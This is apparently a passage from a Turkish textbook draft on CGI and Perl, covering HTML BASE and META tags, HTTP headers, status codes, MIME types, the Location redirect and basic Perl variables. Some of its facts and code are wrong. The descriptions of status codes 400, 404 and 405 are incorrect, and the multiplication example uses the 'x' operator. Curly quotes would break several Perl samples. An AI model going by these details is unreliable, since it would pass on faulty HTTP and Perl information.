HTML’i çok iyi bilseniz de burada ele alacağımız etiketlerin CGI açısından önemi üzerinde duracağımız
için bu bölümü atlamasanız, iyi olur.

<BASE> Etiketi

Bir belgede daha sonra belirtilecek kaynakların aranması gereken temel URL’i gösterir. Diyelim ki HTML
belgesinde bir resme yer veriyorsunuz. HTML dosyasını siz yazdığınızda bunu muhtemelen şöyle
yazarsınız:CGI / Perl                                            25
<IMG SRC=”cicekler.png”>

Web Server “cicekler.png” dosyasını da HTML ile birlikte Browser’a gönderebilmek için bu resmi ona
atıf yapılan HTML dosyası ile aynı dizinde arayacaktır. Böyle bir HTML etiketini CGI programı yoluyla
yazdırırsanız, muhtemelen şöyle bir Perl kodu yazacaksınız:

print "<IMG SRC=\”cicekler.png\”>\n";

Şimdi, eğer daha sonra önereceğimiz güvenlik önlemlerini yerine getirir ve bütün Perl dosyalarını
sitenizin kök dizininde /cgi-bin/ alt-dizininde toplarsanız, Server bu kez resim dosyasını CGI
programınızın durduğu dizinde arayacak; ve büyük bir olasılıkla bulamayacaktır. BASE etiketi, Server ve
Browser’a bütün bölge için geçerli bir temel hareket noktası veya temel dizin vermeye yarar. HTML
belgesinin başlık bölümünde şöyle bir etiket yazarsanız, Server da, Browser da, neyi nerede
arayacaklarını bilmiş olurlar:

<BASE HREF=”http://benim_sitem.com.tr/resimler/”>

CGI programlama kolaylığı bakımından düşünmeseniz bile, her resim için ayrı ayrı:

print “<IMG SRC=\”http://benim_sitem.com.tr/resimler/cicekler.png\”>\n”;

yazmaktan kurtulursunuz. Kaldı ki, resimlerinizi bir başka dizine aldığınızda sitedeki bütün kodları tek
tek düzeltmektense, sadece CGI programınızın bir satırını düzeltmek daha kolay olmalı.

<META> Etiketi

Siz Browser’ın URL adres hanesine “http://bilmenne.com/filanca.htm” yazıp Enter’a bastığınızda,
Internet’te “Bilmemne.com” olarak bilinen bilgisayar, sizin bilgisayarınıza “filanca.htm” dosyasını
göndermeye kalkmadan önce, “HTTP Headers” denen bir takım “ön bilgiler” gönderir; ve böyölece bir
bakıma Browser’ı alacağı belgeyi “nasıl anlaması ve yorumlaması” gerektiği konusunda uyarmış olur.
HTML dili ikinci sürümüne ulaştığında, uzmanlar, bu başlıkları da standardize ederek, HTML belgesinin
başlık (<HEAD>..</HEAD>) bölümüne koymayı düşündüler. Böylece Server’ın Browser’a göndereceği ön
bilgiler de Web tasarımcısının kontrolüne girdi.

Biz yukarıdaki örneklerde bir META etiketini (“http-equiv=.. content=.. charset=..”) kullandık. Bundan
başka meta etiketleri de vardır. Örneğin, “Keywords” META etiketi, HTML belgesiyle ilgili arama
yapıldığın bu kelimelere bakılmasını sağlar. CGI programcısı olarak dinamik bir içerik sunabilmek içn
ziyaretçiye uygun HTML sayfasını Perl programımıza, bu kelimelerle arattırabiliriz.

Bazı Web Server programları META etiketleri tam olarak okumazlar; veya aynı META etiketinden iki
kere yazarsak, birincisini unutabilirler. Fakat bu bizi yıldırmamalı; sayfalarımıza uygun META etiketleri
daima koymalıyız.

////////////////////////////////KUTU BITTI////////////////
CGI / Perl                                            26
İstemcinin İstekleri - Sunucunun Sundukları


CGI programlarının Browser’la ilişkisini ele aldık. Fakat CGI programı, “Browser için” yazıldığı kadar
“Server için” de yazılır. CGI ile Server’ın çalışmasını da programlamış oluruz. Bu yüzden, Server’ın CGI-
HTML ilişkisindeki yerini da tanımak zorundayız. Server’ı tanımaya Browser ile istem-sunuş ilişkisindeki
yerinden başlayabiliriz. Browser ile Server nasıl alış veriş yapıyorlar; ne alıp, ne veriyorlar!

Ziyaretçi olarak siz Browser’ın URL adres kutusuna, sözgelimi server.com adlı halayî sunucudaki
merhaba.htm belgesinin adını (adresini) yazdığınızda neler olur? Bunu kısaca, adım adım görelim:

1. Browser’ın http://www.server.com/merhaba.htm adlı belgeyi talep etmesi, Server’a bir “HTTP
Request” (HTTP Talep) komutu göndermesi demektir. “GET” şeklindeki bu komut sadece “Bana şu
kaynağı gönder!” şeklinde olmaz. Browser komutun arkasına Browser’ın ne tür belgeler (text, HTML,
Access, Excel, vs uygulama programı dosyaları) ve media (GIF, JPEG, Bitmap, vs.) kabul edebileceğini, ve
Browser’ın türü ve sürümünü, ve dosya ilgili (varsa) önşartlarını da ekler.

Diyelim ki bir Browser, bir Server’dan index.htm adlı dosyayı istiyor ve bu dosyayı ancak ve sadece 12
Ocak 2000, GMT saat 10:00’dan sonra değişmişse göndermesini şart koşuyor. Bu durumda “HTTP
Request” şöyle olur:

    GET /index.htm HTTP/1.1

    If-Modified-Since: Sun, 12 Jan 2000 10:00:00 GMT

    Accept: text-html

    Accept: */*

    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)Burada, Browser, varsayılan talep komutu olan GET ile ne istediğini ve ne kabul edebileceğini Server’a
bildiriyor.

2. Server bu talebi alınca önce belgeyi arar; bulamazsa Browser’a hata mesajı gönderir. Server, bu
dosyayı bulursa, önce uzantısına bakarak, ne tür bir dosya olduğuna karar verir; ve

3. Bu karara dayanarak, gerekli başlık (header) bilgilerini ve dosyanın içeriğini talep sahibi Browser’a
gönderir. (Bu arada başlıkla içerik arasına bir boş satır koyması da ihmal etmez! Bu boş satır, Server’ın
Browser’a gönderdiği iki önemli veri kümesini birbirinden ayırmaya yarar.)

Bu bilgi aşağı yukarı şuna benzer:

    HTTP 1.1 200 OK

    Date: Mon, 12 Jan 2000 02:30:49 GMTCGI / Perl                                            27
    Server: Internet Information Server 4.02.06.31

    Content-type: text/html

    Content-length: 235

    Last-modified: Mon, 12 Jan 2000 02:25:00 GMT    <HTML>

    <HEAD>

    <TITLE>MERHABA DÜNYA</TITLE>

    <meta http-equiv=\"content-type\" content=\"text/html; charset=ISO-
    8859-9\">

    <meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-
    1254\">

    </HEAD>

    <BODY>

    <H4>Merhaba Dünya</H4>

    </BODY>

    </HTML>///////////////////TASARIM İÇİN NOT//////////////

Yukarıdaki kodda <HTML> diye başlayan satırın üzerinde bir satır boşluk olması gerekir! 

/////////////////NOT BITTI///////////////////////////////

Bu bilgileri yakından incelersek, başlık bölümü ile gövdeyi birbirinden bir boşluğun ayırdığını görürüz. Bu
boşluğun görevi başlık bölümü ile gövdeyi ayırmak değil, başlık bölümünün bittiğini Browser’a belirtmek
içindir. Bu boşluğun üstündeki başlık bölümünde birinci satırda durum başlığı (status header) denilen
Server Protokolünün istenen belgeyi bulup, bulamadığını belirten bilgi yer alır. Buradaki örnekte yer
alan “200” kodu, belgenin bulunduğunu gösterir.

////////////////KUTU//////////////////

HTTP Statü Kodları:


Kod       Mesaj              Anlamı


CGI / Perl                                            28
200     OK           Aranan belge bulundu ve gönderildi

204     No Content       Belge bulundu, fakat gönderilecek bir içerik yok
                   (Browser’da mevcut görüntü değişmez)

301     Moved Permamently    Aranan belge temelli başka bir adrese aktarıldı (Yeni
                   adres Location Header-Yer Başlığı bölümüne yazılır)

302     Moved temporarily    Aranan belge geçici olarak başka bir adrese aktarıldı
                   (Yeni adres Location Header-Yer Başlığı bölümüne yazılır)

400     Cannot be found     Erişmek istediğiniz dosya bulunamıyor

401     Unauthorized      Erişmek istediğiniz belge korunmuştur (Browser, kullanıcı
                   adı ve parola soran bir pencere açabilir)

403     Forbidden        Erişmek istediğiniz belgeye erişim yasaklanmıştır

403.10    Access Forbidden    Erişmek için sunduğunuz yetki kaydı yeterli değil

403.11    Access Forbidden    Erişmek için sunduğunuz parola değişmiş

404     Site not found     Aradığınız site (URL) bulunamıyor.

405     Resource not allowed  Dosya, yanlış adres verdiğiniz için bulunamıyor

406     Not acceptable     Browser’ınız istediğiniz kaynağı görünteleme yeteneğinde
                   olmadığı için istediğiniz dosya gönderilmiyor

410     Does not exist     Aradığınız dosya temelli bulunamıyor

412     Precondition Failed   Dosya istemcinin ileri sürdüğü önşartlara uymadığı için
                   gönderilmiyor.

414     URI Too Long      Dosya için yazılan yol çok uzun

500     Internal server error  Dahilî Server Hatası oluştu

501     Not implemented     İstediğiniz yazılım/media türü bu Server’da
                   uygulanamıyor

502     Bad Gateway       Server geçit olarak görev yaparken, kendisinden sonraki
                   bir Server’dan hatalı yanıt aldı

     //////////////////KUTU BİTTİ///////////////////////////

     Durum Başlıklarını, CGI yoluyla talep ettiğimiz bir sayfa veya başka bir dosyanın
bulunamaması halinde, ziyaretçinin ekranına hata mesajı gönderilmesini önleyecek tarzdaCGI / Perl                                        29
kullanabiliriz. Ayrıca ilerde göreceğimiz gibi, CGI programımız, Server’a doğrudan bir
sayfanın yerini HTTP Request komutu olarak bildirebilir. Şimdilik sadece bunu “location”
(yer) başlığını kullanarak yapacağızı belirtelim.

    Peki, bu isteme-sunma ilişkisinde CGI programımız nerede yer alıyor? Yukarıda
Server’ın Browser’ın talebini aldığında bir karar verdiğini belirttiğimiz 2’nci maddeyi
hatırlıyor musunuz? İşte o karar sırasında Server, talep edilen kaynağın bir CGI programı
olduğunu görürse, derhal bu program için bir “Çevre” (Environment) hazırlar, ve CGI
programını çalıştıracak yardımcı programı (örneğin Perl) çağırır. CGI programı (yani
perl.exe), kendisine verilen “çevre” değişkenlerini kullanarak, yine kendisine ulaştırılan Perl
Script’ini (betiğini) çalıştırır ve elde ettiği sonucu Server’a verir. Server bu sonucu irdeler ve
elde ettiği çıktıyı (Output’u, sonucu) Browser’a gönderir. Bu sonuç Perl programının
beklediği sonuç olabilir; örneğin Form bilgisi başarıyla işlenebilir. Veya sonuç arzu edildiği
gibi olmaz; bir hata durumu oluşur. Bu kez Browser’a hata mesajı iletilir.

    Buraya kadar anlattıklarımızı bir de görsel olarak belirtelim.

<cgi-perl010.tif>

    Burada genel bir CGI uygulamasının akış şemasını görüyoruz; fakat öyle
programlarımız olabilir ki, CGI programının sonucu doğruca istemci Browser’a gönderilir.
Kimi zaman, CGI programının sonucu Server’ın başka bir kaynağa yöneltilmesi (Redirect)
komutu olabilir. CGI programı, söz gelimi bir siteye girişini koruyan parola programı ise,
Server’ı, istemciden yeni bilgi edinmeye zorlayabilir.


Çıktı Türleri ve Yer


Bu şemanın son aşaması olan çıktının istemci Browser’a gönderilmesi, CGI programcısı olarak bizim
açımızdan çok önem taşır; çünkü şu ana kadar geri planda yaptığımız her şey, bu noktada Internet
ziyaretçimizin huzuruna çıkacaktır. Yukarıda yazdığımız küçük Perl örneklerine tekrar bakarsanız,
hepsinde şuna benzeyen bir komut satırı göreceksiniz:

    print "Content-Type: text/html\r\n\r\n";

Bu satır, Web Server’ın, CGI programının sonucunu istemciye gönderebilmek için kendi üreteceği başlık
(Header) bölümüne koyması gereken asgarî bilgiyi vermektedir. Server, istemciye, istediği dosyayı,
belgeyi, kaynağı veya çalıştırılmasını istediği programın sonuçlarını bildirirken, belirttiğimiz başlık
bölümünü yazmak zorundadır; yoksa gönderilenleri Browser’ın anlaması ve yorumlaması mümkün
olmaz; en azından bu unsurlar Browser tarafından bizim istediğimiz tarzda görüntülenmeyebilir.
Server’ın istemciye göndereceği unsur bir HTML sayfası ise, tasarımcı olarak HTML kodumuzun içine hiç
META etiketi koymamış olsak bile sorun olmaz: Server, başlık bölümünü kendi üretebilir. Fakat iş CGICGI / Perl                                          30
programına geldiği zaman, Server kendisini programın yerine koyup, başlığın tümünü üretemez;
programdan da en azından kendi bölümüne ilişkin başlık bilgilerini vermesini ister. Bizim örnek Perl
programlarımızda yer verdiğimiz “Content-Type” bilgisi, Server tarafından programımızın çıktı’sını
(Output’unu) Browser’a tanıtmasına yarar.

CGI programlarımızın Server’a bir çok başlık bilgisi (üst-bilgi) vermesi gerekir; ama bunların asgarîsi,
içerik türü (Content-Type) veya gönderilecek malzemenin yeri (Location) bilgisidir. İçerik türü bilgisi,
Browser’a kendisine gönderilmekte olan veriyi nasıl yorumlayacağını bildirir. Browser’ların genellikle
Server’ların anlayabildiği içerik türlerinin tümünü anlayabilirler. Bununla birlikte bugün piyasada birçok
Server programı vardır; bunların hepsi her türlü metin veya çoklu-ortam (Multimedia) dosyasını
tanımazlar. Farklı Server ve Browser programları arasında anlayış birliği sağlamak için geliştirilmiş olan
standarta, MIME (Multimedia Internet Mail Extensions) adı verilir. MIME gerçekte HTTP Server’ları ve
Web Browser’ları için değil POP ve SMTP Server’ları ile elektronik mesaj editörleri arasında içinde ses,
grafik ve görüntü (video) bulunan elektronik mesaj alışverişine birlik getirmek üzere geliştirilmişti. Fakat
Web’in hızlı gelişimi sırasında HTTP Server ile Web Browser arasında bir belge yorumlama standardı
geliştirme ihtiyacı doğunca, kullanılmaya hazır MIME’dan yararlanıldı. Bu standarta göre,
“Content=Type:” bilgisi “tür/alt-tür” şeklinde yazılır. Örneğin, CGI programımızın çıktısı Browser’a HTML
dosyası olarak gönderiliyorsa, buna ilişkin bilgi “text/html” şeklinde yazılır. Çünkü MIME’a göre HTML
dosyası bir düz metin dosyasıdır.

/////////////////////KUTU//////////////////////////////

Belli başlı MIME tür/alt-tür grupları


    text/plain             Düz metin. Server istenen belgenin uzantısından türünü
                      anlamazsa veya siz CGI programınızda çıktı’nızın içerik türünü
                      belirtmezseniz, Server düz metni varsayılan içerik türü sayar.

    text/html              HTML dosyası

    text/richtext            Rich Text biçimi. Bir çok kelime-işlemcisinin ortak dosya
                      biçimidir; bir çok Browser tarafından anlaşılabilir.

    image/gif              GIF grafik dosyası. Ortak bir biçim olmakla birlikte, içendiği
                      sıkıştırma teknolojisinin kullanımı için bir firmaya telif hakkı
                      bedeli ödeme zorunluğu getirildiğinden bu yana yerini diğer
                      biçimlere bırakıyor. Browser’lar tarafından IMG etiketiyle
                      birlikte kullanıldığında HTML belgesinin parçası olarak
                      görüntülenir.

    image/jpeg             JPEG grafik dosyası. GIF’ten daha çok renk derinliği içerebilir.
                      Bütün Browserlar tarafından tanınır ve IMG etiketiyle birlikte
                      kullanılabilir.CGI / Perl                                             31
    image/png         PGN grafik dosyası. Internet için geliştirilmekte olan grafik
                  biçimi. Henüz bütün Browserlar tarafından tanınmıyor. Bu
                  biçimi tanıyan Browserlar, IMG etiketiyle kullanılan PNG
                  dosyasını HTML belgesi içinde görüntüleyebilirler.

    image/x-xbitmap      Bitmap grafik dosyası. (Genellikle dosya adının uzatması .xbm
                  olur.) Görüntü, piksel olarak tanımlandığı için fazla ayrıntılı
                  görüntüler için elverişli değildir. Bütün Browserlar tarafından
                  tanınmaz.

    audio/basic        8-bit ulaw sıkıştırma tekniği ile üretilen ses kayıt dosyası.
                  (Genellikle dosya adının uzatması .au olur.) Bütün Browserlar
                  tarafından tanınmaz.

    audio/x-wav        Microsoft firmasının geliştirdiği Windows sistemi için ses
                  kayıt dosyası. (Bütün Browserlar tarafından tanınmaz)

    video/mpeg         MPEG video kayıt dosyası. Bütün Browserlar tarafından
                  tanınır.

    video/quicktime      Apple firmasının geliştirdiği MacOS ve Windows sistemleri
                  için video dosyası. Browseın tanıması için ek program
                  çalıştırılması (plug-in) gerekebilir.

    video/x-msvideo      Microsoft firmasının geliştirdiği Windows sistemi için video
                  kayıt dosyası. (Genellikle dosya adının uzatması .avi olur.)

    application/octet-stream  Server tarafından tanınmayan bütün dosya türleri için bu
                  içaret türü gönderilir ve bunu gören Browser kullanıcıyü bu
                  dosyayı çalıştırmak veya görüntülemek yerine sabit diske
                  kaydetme imkanı tanır.

    application/postscript   Postscript yazıcı dili ile gönderilen herhangi bir içerik.

    application/vnd.ms-excel  MS Site Server, Internet Information Server veya kişisel Web
                  Server programlarının tanıdığı MS Office yazılım paketindeki
                  Excel programının dosyası. Microsoft işletim sistemlerinde
                  çalışan hemen hemen bütün Web Server programları
                  tarafından da tanınmaktadır. (Bu türün alt türleri arasında
                  “application/vnd.ms-powerpoint” ve “application/msword”
                  de bulunur. MS firmasının Internet Browser programı IE
                  tarafından bu içarek türü tanınır ve ilgili MS yazılı çalıştırılarak
                  dosyanın içeriği görüntülenir; diğer browserlar bu içerik
                  türünü sabit diske kaydetmeyi önerirler.
CGI / Perl                                         32
      ///////////////KUTU BİTTİ//////////////////////

  Bir içerik türü satırında parametre de kullanılabilir. CGI programlarının bu tür özellik belirten
  parametrelere ihtiyacı çoğu zaman olmaz; ama örneğin gönderdiğiniz HTML sayfasının dili burada
  belirtilebilir.

  CGI programlarımızda belirtebileceğimiz asgarî başlık bilgisi (üst-bilgi) “Location” (yer) de olabilir. CGI
  programımız kimi zaman ortaya bir belge çıkartmaz; diyelim ki mevcut bir başka kaynağa göndermede
  bulunabilir. Internet’teki belge veya diğer görüntülenebilir, çalıştırabilir, seslendirebilir, oynatılabilir
  herhangi bir unsura “URI” denir. “Uniform Resource Identifier” (Tekdüze Kaynak Kimliklendirici)
  kelimelerinin başharfi olan URI, isim veya adres+isim olabilir.

  ////////////////KUTU//////////////////

  URI türleri


  Beli başlı URI’lerin arasında “URL” (Uniform Resource Locator/Tekdüze Kaynak Yer-belirleyici) vardır. Bir
  diğer “URI” türü ise “URN” (Uniform Resource Name/Tekdüze Kaynak Adı) sayılabilir. Bir başka “URI”
  türü olarak, “URC” (Uniform Resource Citation/Tekdüze Kaynak Göndermesi) türü vardır. Başka bir
  deyişle Internet’te herhangi bir kaynağın kimliği (URI’sini) belirmek için yerini (URL), adını (URN) veya
  ona yapılan bir göndermeyi (URC) belirtebilirsiniz.

  “http:”, “ftp:”, “gopher:” diye başlayan Internet kaynak adresi, URL’dir.

  URN’lerin adresleri “urn:” şeklinde başlar.

  URC türü adreslendirme standardında ise henüz World Wide Web Konsorsiyomu (w3c.org) içinde
  görüşmeler tamamlanmamış bulunuyor.

  //////////////////////////////////////////KUTU BİTTİ////////////////////

  Diyelim ki, bir CGI programında, Browser’a program sonucu olarak kendimiz “print..” komutlarıyla bir
  HTML belgesi oluşturmayacağız, fakat mevcut bir HTML belgesini göndereceğiz. Örneğin istiyoruz ki
  programımız istemciye “merhaba.htm” dosyasının yerini (Location) bildirmekle yetinsin. Bunu, şöyle bir
  Perl programıyla yapabiliriz:

#!/usr/local/bin/perl

# dosya-gonder.plprint “Location: /merhaba.htm\n\n”;
  CGI / Perl                                             33
  ///////////////////TASARIM İÇİN NOT//////////////

  Yukarıdaki kodda print diye başlayan satırın üstünde ve altında bir satır boşluk olması gerekir! 

  /////////////////NOT BITTI///////////////////////////////

  Burada Location başlık bilgisini oluşturacak satırın altında da boşluk bıraktığımıza dikkat edin: bu
  Server’a başkaca bir başlık (Header) bilgisi vermeyeceğimizi gösöterir. Bu tek satırlık komutu alan
  Server, Browser’a (sanki Browser bu sayfayı istemiş gibi) bu kaynaktaki sayfayı gönderir. Kimi zaman
  kaynak, burada olduğu gibi Server’ın kendi sabit diskinde bir dizide bulunmayabilir ve tam bir URL
  olabilir. Örneğin:

#!/usr/local/bin/perl

# dosya-gonder.plprint “Location: http://www.webteknikleri.com/\n\n”;
  ///////////////////TASARIM İÇİN NOT//////////////

  Yukarıdaki kodda print diye başlayan satırın üstünde ve altında bir satır boşluk olması gerekir! 

  /////////////////NOT BITTI///////////////////////////////

  Bu durumda bizim Server, istemci Browser’a “302” yani “Dosya başka yere nakledildi!” sonucu ve kendi
  ürettiği HTML sayfası içinde “Aradığınız dosya için <A HREF= http://www.webteknikleri.com/>
  burayı</A> tıklayınız!” gibi bir mesaj gönderir. (Bu HTML sayfasının şablonu Server’da bulunur ve Server
  operatörü tarafından belirlenir. Server’larda bütün HTTP Statü Kodları için kullanılmaya hazır şablon
  HTML sayfaları bulunur.)

  Diğer Başlıklar


  Yukarıda bir HTTP Server’nın Browser’a gönderdiği tipik bir başlık örneği olarak verdiğimiz metinde,
  tarih ve saat dikkatinizi çekmiş olmalı. Biçimi Server’ına göre değişmekle birlikte hemen bütün Web
  Server’lar, başlık (Header) bilgisinin içine tarih ve saat bilgisi de koyarlar. Browser bu bilgiye bakarak,
  almakta olduğu belgenin (varsa) kendi yedek deposunda (cache, veya Windows sistemlerinde Geçici
  Internet Dosyaları dizini) sakladığı sürümünü mü görüntüleyeceğine, yoksa yeni gelen sürümünü mü
  görüntüleyeceğine karar verir. Örnek:

#!/usr/local/bin/perl  CGI / Perl                                             34
# tarih-saat.plprint "Content-Type: text/html\r\n\r\n";

print $time = (localtime), “\n”;
  ///////////////////TASARIM İÇİN NOT//////////////

  Yukarıdaki kodda print diye başlayan satırın üstünde ve altında bir satır boşluk olması gerekir! 

  /////////////////NOT BITTI///////////////////////////////

  Browser’a göndereceğimiz başlık bilgileri içine Expires başlığını koyarak, sayfanın “cache edilmesini”
  (depolanmasını) önleyebiliriz. Bu durumda Browser, gelmekte olan belgenin kendi yedek deposunda bir
  örneğini aramaz.

  Sonuç


  Bu bölümde, Internet’te sunucu ile istemcinin, Web Server ile Internet Browser programının buluştuğu
  yeri, CGI’ı tanıdık; Internet ilişkisinin iki ucundaki bu varlıkların etkileşmesinin esaslarını gördük; ve bu
  ilişkiyi CGI programı yoluyla nasıl etkilediğimizden söz ettik. Küçük de olsa Perl programı yazdık ve
  Perl’ün nasıl işlediği hakkında fikir edindik. Fakat henüz bu dil hakkında temel kavramları bilmiyoruz.

  Şimdi sıra, CGI’da yolumuzu şaşırmayacak kadar Perl öğrenmekte!
  CGI / Perl                                             35
        Perl’ün Yapı Taşları


Sadece bir Web Server’da çalışacak da olsa CGI programımızı yazmakta kullandığımız Perl dili, güçlü bir
dildir. Perl ile çok şey yapılabilir. CGI programı yazmak, Perl ile yapabileceğimiz işlerden belki de en
basitidir. Perl’ü dil olarak öğreten bir çok kaynak bulabilirsiniz. Biz burada Perl’ü sadece CGI
programcısının bilmesi gerektiği düzeyde tanımaya çalışacağız.

Perl ile program yazmak için ne büyük derleyiciler, ne de “Visual Perl Programlama Araçları” yok! Perl
programı yazarken kullanacağımız tek araç, Windows ortamında Not Defteri, Macintosh’ta Simple Text,
Linux’ta ise CoolEdit olabilir. Perl programı yazmak için kelime-işlem programı kullanırsanız,
metinlerinizi düz yazı veya ASCII biçiminde kaydetmelisiniz.

Her program, bir öbek veriyi alır ve işler; ortaya bir sonuç çıkartır; veya çıkartmaz. Ortaya somut bir
sonuç çıkmaması da programın sonucu olabilir. Perl de işleyebilmek için önce veriye ihtiyaç duyor. Biz
insanlar veriyi gördüğümüz anda türünü de anlarız. Bazı bilgisayar programlama dilleri, bizim gibi,
verinin türünü, verinin kendisini görünce anlar. Perl’e verinin türünü belirtmek gerekir. Perl’ün verilerle
yapabileceği işlemler (operator) klasik aritmetik işlemlerdir. Fakat Perl daha bir çok işlem yapabilir.
Bunlar ya Perl’ü geliştirenler tarafından belirlenmiştir (bunlara fonksiyon, işlev denir; ya da
fonksiyonlarımızı biz yazarız veya başkalarından (kitaplık/library denen dosyalar halinde) ödünç alırız
(bunlara da subrutin denir). Ve bütün bunların sonunda Perl programı ortaya bir sonuç çıkartır ve bu
sonucu kendisini göreve çağırana, yani Web Server’a verir.

Bilgisayar programlama uzmanları, Perl’ü bir “okuma ve yazma dili” sayarlar. Perl ile bir veya daha fazla
dosya (bilgi, kaynak) okunur; bir sonuç çıkartılır; ve bu sonuç bir başka dosyaya (bilgi deposuna,
kaynağa) yazılır. Şimdi Perl’ün bu okuma-yazma işini nasıl yaptığına yakından bakalım:

Perl’de Veri


Veri, Perl’ün üzerinde işlem yaptığı şeylerin tümüdür. Veriler, rakam, harf veya işaretlerden ibarettir.
Ancak her rakam sayı değildir; bizim Perl’e belirtmemiz gereken ilk şey, ona verdiğimiz verinin sayı mı,
yoksa rakam bile olsa sayı-dışı, alfanümerik bir değer (hem harf, hem rakam veya sadece harf veya
sadece rakam ve diğer işaretleri içeren karakter dizisi) mi olduğunu söylememiz gerekir. Buna dikkat
edin. Çünkü Perl’de daha sonra göreceğimiz herşey verileri bu şekilde ikiye bölmekten kaynaklanır.
Şimdi 45’in sayı olması için toplanabilir, çıkartılabilir olması gerekir. 34 yaş olarak, kilo olarak, kilometre
olarak bir anlam taşıyorsa, sayıdır. Buna karşılık 34, Istanbul’un il sıra numarası ise sayı-dışı bir rakamdır;
buna Perl’ün dilinde String denir. Bir sınıftaki 20 öğrencinin “yaş” rakamları toplanır, 20’ye bölünürse
ortaya çıkan rakam, halâ sayıdır: adına “sınıfın yaş ortalaması” denir ve bu rakam (doğru adıyla sayı)
başka istatistik hesaplarda kullanırsanız size istatistikçi denir. Buna karşılık 20 ilin il sıra numaraları
toplanır, 20’ye bölünürse ortaya anlamsız bir şey çıkar; ve bunu görenler size şaşkın gözlerle bakarlar.
Sayılarla aritmetik işlemler yapılır. String (karakter dizeleri) ile, rakam bile olsa, aritmetik işlemCGI / Perl                                              36
yapılmaz. Perl için, 0’dan 255 ASCII değerine kadar herşey String’dir. Bir harf, Perl için String’dir; bir
kelime veya bir cümle de String sayılır. Perl için String’lerin sınırı yoktur. Buna karşılık sayılar, sınırlıdır.

Perl’e bir rakamın sayı olduğunu belirmek için öylece yazarsınız; karakter-dizelerini yani String’leri ise
tırnak içinde yazarız. Nasıl tırnak? Bir dakika.. Oraya geliyoruz.

Şimdi, bir bilgisayarda 0’dan 255 ASCII değerine kadar sıralanan karakterlerin arasında neler olduğunu
hatırlayın. Sözgelimi ASCII 7 değeri nedir? Bilgisayarın bip sesi çıkartması. Peki 13 değeri nedir? Satır
başı. O halde, bunlar da String’e, karakter-dizesine dahil midir? Evet. Peki bu değerler de karakter mi
sayılır? Ona da Evet.

Bu yüzden Perl’de String’leri yazarken veya kullanırken tek tırnak içine almakla, çift tırnak içine almanın
farkı vardır. Tek tırnak içine aldığınız String’in içinde sadece ekranda görüntülenebilen karakterler yer
alır. Eğer String’iniz görüntülenemeyen karakter değerlerini içeriyorsa, bu dizeyi mutlaka çift tırnak içine
almanız gerekir. String’i çift tırnak içine alırsanız, içine sekme, satır başı veya heksadesimal (16 tabanlı)
kodlar koyabilirsiniz. Tek tırnak-çift tırnak farkının bir diğer sonucu ise çift tırnak kullanadığınız taktirde,
String’in içine değişken de koyabilirsiniz. Buna, Perl ile metin işlemeyi ele aldığımız zaman döneceğiz.

Sabit Değerler, Değişkenler


Peki, demek ki Perl için üzerinde işlem yapılabilecek iki tür veri olabilirmiş: sayılar ve sayı-dışı karakter
dizeleri (Stringler).

////////////////SAYFA TASARIMI NOTU////////////////

Yukarıdaki son kelime olan Stringler kelimesine dipnot işareti konarak, bu sayfaya şu dipnotun
konulması rica:

“String” ve diğer İngilizce kelimeleri kullanmamak için çok özen gösterdiğimi belirtmeliyim.
Üniversitelerimizin incelediğim ders notlarında ve diğer Türkçe kaynaklarda da bu özen gösterilinceye
ve meselâ bir kere belirttikten sonra bir daha İngilizce terim yerine ortak Türkçe bir terim kullanılıncaya,
yani birlik sağlanıncaya kadar, bireysel çabalar, ancak burada olduğu gibi gereksiz tekrarlardan başka bir
şeye yaramayacaktır.

////////////////////////SAYFA TASARIMI NOTU BİTTİ///////////////////

Perl, için veriler ister sayı, ister karakter-dizesi olsun, program boyunca aldıkları durum itibariyle de
ikiye ayrılır: Programın başından sonuna kadar değişmeyen sabit veriler ve belirli durumlarda
değişenler. Birinci gruba belirli bir sayı veya karakter-dizesi girer. Sözgelimi, bu kod satırındaki veri
sabittir:

    print “3 kere 3 = 9”;

Bir veri program boyunca çeşitli sebeplerle değişecekse, bu verinin yernini tutmak üzere bir değişken
veri tanımlarız. Değişken tanımlamak demek, Perl’e “Kardeşim-veya nasıl hitap etmek istiyorsanız, öyle-


CGI / Perl                                                37
şimdi bana bir kap hazırla, bu kaba ‘çarpan’ adını ver; sonra bir kap daha hazırla ona da ‘çarpılan’ adını
ver; bir kap daha hazırla ona da ‘sonuç’ adını ver. Ben bu ilk iki kabın içine bir takım değerler koyup,
çıkartacağım. Sana ‘Çarpan’ın değerini çarpılan’ın değeri ile çarp, bakalım!’ dediğim anda bu iki kapta o
anda ne değer varsa, onları birbiri ile çarp; elde ettiğin sonucu da götür ‘sonuç’ kabının içine yaz!”
demektir. Bu komutu böyle Türkçe değil de Perl’ce verdiğiniz anda, nurtopu gibi üç değişkeniniz olur;
bunların içine ister siz, ister program, isterse komşunun oğlu istediği değeri koyabilir.

Ve öyle bir an gelir ki, Perl programınızda şöyle bir komut belirir:

    $sonuc = $carpan x $carpılan;

    print $sonuc;

Bir adım ileri gittik; şu dolar işaretlerini bir paragraf boyunca görmezden gelin! Anlaşıldığı üzere Perl’de
değişken tanımlamak demek, sadece bir “yer açmak” demektir. Bunu tiyatrodaki koltuk numaralarına
benzetebilirsiniz: C25 numara bir koltuğa işaret eder; ama o koltukta bugün siz, yarın başkası oturabilir.
Tiyatroda bulunduğunuz sürece siz C25 numaralı koltuğu dolduran değersiniz. Eser bittiğinde kalkıp
gideceğiniz ve yerinizi başkası alacağı için, koltuğun değeri değişken demektir. Tıpkı kötü eser
sahneleyen bir tiyatronun C25 numaralı koltuğunun boş kalmış olabileceği gibi Perl’ün değişkenlerinin
de içi boş olabilir veya sonradan boşalabilir.

Perl, başka diller gibi değişken adları konusunda aşırı titiz davranmaz. İstediğiniz rakam veya harfi fakat
sadece alt çizgi (_) işaretini değişken adında kullanabilirsiniz. Unix kökenli bir dil olarak gedikli Perl’cüler
sadece küçük harf kullanırlar ve büyük kullananlara da iyi gözle bakmazlar! Fakat Perl büyük harfle
yazacağınız değişken adlarına hiç itiraz etmez. Fakat Perl büyük harfle küçük harfi ayırır. Yani Perl
açısından “Osman” ile “osman” iki ayrı isimdir. Ayrıca Perl için değişken adları rakamla başlayamaz.

Değişken adının tanımmayıcı olmasına dikkat etmek gerekir: “kapi_no” adı, daima “degisken014”
adından iyidir. Her ikisi de Perl açısından makbul değişken adlarıdır, ama ikincisi sadece sizi şaşırtmaya
ve programınıza gereksiz hatalar karışmasına sebep olur.

Tekil Değişkenler, Listeler, Ekleme, Çıkartma


